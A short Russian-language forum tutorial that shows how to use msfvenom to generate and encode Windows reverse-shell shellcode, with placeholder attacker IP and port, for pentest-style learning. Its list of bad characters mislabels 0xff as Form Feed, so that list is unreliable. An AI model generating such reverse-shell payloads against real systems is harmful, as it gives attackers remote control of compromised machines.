Msfvenom представляет собой комбинацию msfpayload и msfencode, объединяя оба эти инструмента в одном экземпляре Framework.
Что такое шеллкод?
При взломе шеллкод - это небольшой фрагмент кода, который используется в качестве полезной нагрузки при использовании уязвимости программного обеспечения. Он называется «шеллкод», потому что он обычно запускает командную оболочку, из которой злоумышленник может управлять скомпрометированной машиной, но любой фрагмент кода, выполняющий аналогичную задачу, может называться шеллкодом.
Вы можете написать свой собственный шелл-код и использовать некоторые инструменты для их генерации, msfvenom является одним из таких инструментов, с помощью которого вы можете генерировать шелл-код.
Команда:
Код:
msfvenom -hДля этого урока мы выбрали полезную нагрузку windows / shell_reverse_tcp для генерации нашего шелл-кода,
Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST= yourip LPORT=listeningport -f cВы увидите, что ваш шелл-код генерируется msfvenom, следующим шагом будет удаление плохих символов, так что наш шелл-код выполняется так, как мы хотим, плохие символы являются простыми символами, которые в основном завершают наш код, прежде чем он будет полностью исполнен.
Общие плохие знаки
0x00 NULL (\0)
0x09 Tab (\t)
0x0a Line Feed (\n)
0x0d Carriage Return (\r)
0xff Form Feed (\f)
Чтобы удалить неправильные символы, мы должны кодировать их с помощью какого-то кодировщика, в этом учебном пособии мы использовали shikata_gai_nai кодировщик.
Команда:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST=yourip LPORT=listeningport -f c -e x86/shikata_ga_nai -b “\x00”
Ссылка скрыта от гостей